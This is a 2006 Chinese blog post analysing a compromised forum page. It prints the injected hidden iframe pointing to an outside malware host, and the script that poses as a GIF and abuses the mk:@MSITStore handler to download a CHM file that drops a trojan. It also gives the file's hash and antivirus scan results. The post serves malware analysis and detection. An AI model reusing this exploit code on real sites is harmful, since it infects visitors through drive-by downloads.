endurer 原创
2006-04-08 第1版
网页:hxxp://www.***ai49.com/bbs/reg.asp
有2处被插入了代码:<iframe height=0 width=0 src="hxxp://down.***gament.net/q/f"></iframe>
hxxp://down.***gament.net/q/f的代码为:
<script language="javascript" src="ah.js"></script>
ah.js的代码为:
GIF89a
var GIF89a=document.location.href;GIF89a=GIF89a.substring(0,GIF89a.lastIndexOf('/'));document.write('<OBJECT Width=0 Height=0 style="display:none;" type="text/x-scriptlet" data="mk:%40MSITStore%3Amhtml%3Ac%3A//%2Emht%21'+GIF89a+'%2f1.js::/%23"></OBJECT>');
冒充GIF文件,下载运行1.js。
1.js其实是个CHM文件,会释放/运行.exe文件。Kaspersky报为Trojan-Downloader.Win32.Delf.aet,瑞星报为Trojan.DL.Small.hm。
| File: |
1.js |
| Status: |
INFECTED/MALWARE
|
| MD5 |
617449ed78325096128e604f1e9f9d30 |
| Packers detected: |
-
|
|
Scanner results
|
| AntiVir |
Found Heuristic/Trojan.Downloader (probable variant)
|
| ArcaVir |
Found Trojan.Downloader.Delf.Aet
|
| Avast |
Found nothing
|
| AVG Antivirus |
Found nothing
|
| BitDefender |
Found Trojan.Html.Gamect.A, Trojan.Downloader.Delf.AET
|
| ClamAV |
Found Exploit.HTML.ObjCode-2
|
| Dr.Web |
Found Exploit.CodeBase, Trojan.DownLoader.6966
|
| F-Prot Antivirus |
Found HTML/ObjCode@expl
|
| Fortinet |
Found nothing
|
| Kaspersky Anti-Virus |
Found Trojan-Downloader.Win32.Delf.aet
|
| NOD32 |
Found Win32/TrojanDownloader.Small.AAO, Win32/TrojanDownloader.Delf.AET
|
| Norman Virus Control |
Found nothing
|
| UNA |
Found nothing
|
| VirusBuster |
Found nothing
|
| VBA32 |
Found Trojan-Downloader.Win32.Delf.aet
|
分享到:
相关推荐
动态网页你要弄清楚它网页数据请求及跳转逻辑,这样我们就可以利用JS请求的API,按照一定要求发送带有参数的请求,就可以获得数据。当然,相对于前者的异步加载,更多动态网站的反爬虫措施更强,比如常见的各类...
能够彻底避免木马病毒从网页上对用户的计算机发起攻击,其完全突破了传统的以查杀、拦截为核心的安全思路,在计算机系统内部构造了一个独立的虚拟空间——“360沙箱”,使所有网页程序都密闭在此空间内运行。...
隔离模式会在360浏览器中建立沙盒,强行访问带毒网站而不会中毒。 360l浏览器软件特色: ■全新内核,网页超速打开 ■全面支持HTML5,超凡体验 ■安全可靠,一如既往 360浏览器 v8.1.1.402更新日志: 1. 修复...
省切找资料时一个一个打开的麻烦。 17、《安全维护》(需要账号,他人用不了): 有数据备份与恢复功能; 清除所有数据功能; 删除EXCLE花名册; 18、办公中心: 1)校历表、办公材料(分有通知管理、职称文件...
使用EasyCHM只需要三个步骤就可以完成CHM的制作:1、用户指定一个目录,EasyCHM会自动导入全部目录及文件;2、设置CHM编译选项;3、开始制作。EasyCHM非常适合个人和单位制作高压缩比的带有全文检索及高亮显示搜索...
成功获得结果后,它会给您一个带毒的URL。即将添加: 1页参数检查器2-递归检查安装1-使用installer.sh安装chmod +x installer.sh ./installer.sh 2-安装手册go get github....
应对措施:对付病毒陷阱的最有效方法就是选择一个合适的在线杀毒软件,并随时升 级它的防毒代码,对估计带有恶意代码的不良网站保持警惕,在没有通过病毒检测前不要 轻易打开来路不明的文件。 2。色情陷阱。色情陷阱是...
呵呵,当然也不必那么害怕,毕竟 真正的黑客高手是不屑于攻击个人电脑的,而个人电脑之所以中毒只是因为打开过带病 毒的邮件或者中了带木马病毒的网页,这些病毒代码都很简单的且也很容易预防的,根 本无须谈"马"色...
现在网络上很多软件、 MP3、电子书都夹着木马或病毒,尤其是视频,当你打开视频观看的时候总会弹出一个页 面,那就是网页木马。 6、接收邮件一定直接删除垃圾邮件,尤其是别打开不知名邮件的附件,否则你可能中毒 。...
让默认的就可以了,但是超频玩者是肯定不会放过任何可以提高性能的东西的,所以如果你想在这里让你的电脑提升一点性能的话,就必须慢慢试验,选择一个适当的参数才能让你的计算机达到性能和稳定的最佳状态!...
应对措施:对付病毒陷阱的最有效方法就是选择一个合适的在线杀毒软件,并随时 升级它的防毒代码,对可能带有恶意代码的不良网站保持警惕,在没有通过病毒检测前 不要轻易打开来路不明的文件。 2.色情陷阱。色情陷阱...
防毒措施往往不到位,一旦发生病毒感染,往往扩散 到全网络,令网络陷于瘫痪状态,部分致命的蠕虫病毒利用TCP/IP 协议的各种漏洞,使得木马、病毒传播迅速,影响规模大,导致网络长时间处于带毒运 行,反复发作而...
2、在进程中可以发现的双进程EXE病毒或木马程序,由于手工方式不能同时停掉两个进程,当我们手工掉其中一个进程后,另一个进程会将该进程重新启动。针对这种情况杀毒软件也无能为力,若两个都是非系统进程,我们...
360浏览器官方版是中国使用人数最多的...360浏览器官方版的无痕浏览功能可以让用户在浏览网页时不留下访问痕迹,这样别人就不能在你走后窥探隐私,隔离模式会在360浏览器中建立沙盒,强行访问带毒网站而不会中毒。
任何一个具备管理管理员权限的员工,即使是管理员,使用Administrator权限上网, 稍有不慎,便掉入网络陷阱。为避免这种情况,对PC维护人员,采取区域包干到户的管 理,同时区域负责人的域用户帐号具备该区域内所有...
若一台计算机感染了病毒,只有删除所有带毒文件,就能消除所有病毒A. 错误 02任务 一、单项选择题DAABBBBACACABACADBC 1. 苹果手机的操作系统是D. IOS 2. Android一词的本意是A. 小绿人 3. Windows mobile系统安装...
.NET关于string转换的一个小Bug Regular Expressions 完整的在.net后台执行javascript脚本集合 ASP.NET 中的正则表达式 常用的匹配正则表达式和实例 经典正则表达式 delegate vs. event 我是谁?[C#] 表达式计算引擎...
在电影 《007: 空降危机》 中, 天才特务 Q 把 一个超强骇客主机带到 MI6 总部去,通过它不 仅可以从空中追踪探员与目标的即时动态, 还 可以随时监控整个伦敦。虽然只是导演虚构的 场景, 但这种无所不在的监控让...
被动攻击 D) 非服务攻击 14 特洛伊木马攻击的威胁类型属于 (B) A) 授权侵犯威胁 B) 植入威胁 C) 渗入威胁 D) 旁路控制威胁 15 如果发送方使用的加密密钥和接收方使用的解密密钥不相同,从其中一个密钥难以推出 另...
由于chinaren又改版,校友录已经不好用了,新的版本还要过一段时间才能出来! 请关注我的其它软件 http://www.csdn.net/cnshare/soft/11/11838.shtm http://www.efisc.net ◇chinaren改版,在留言的时候需要认证,...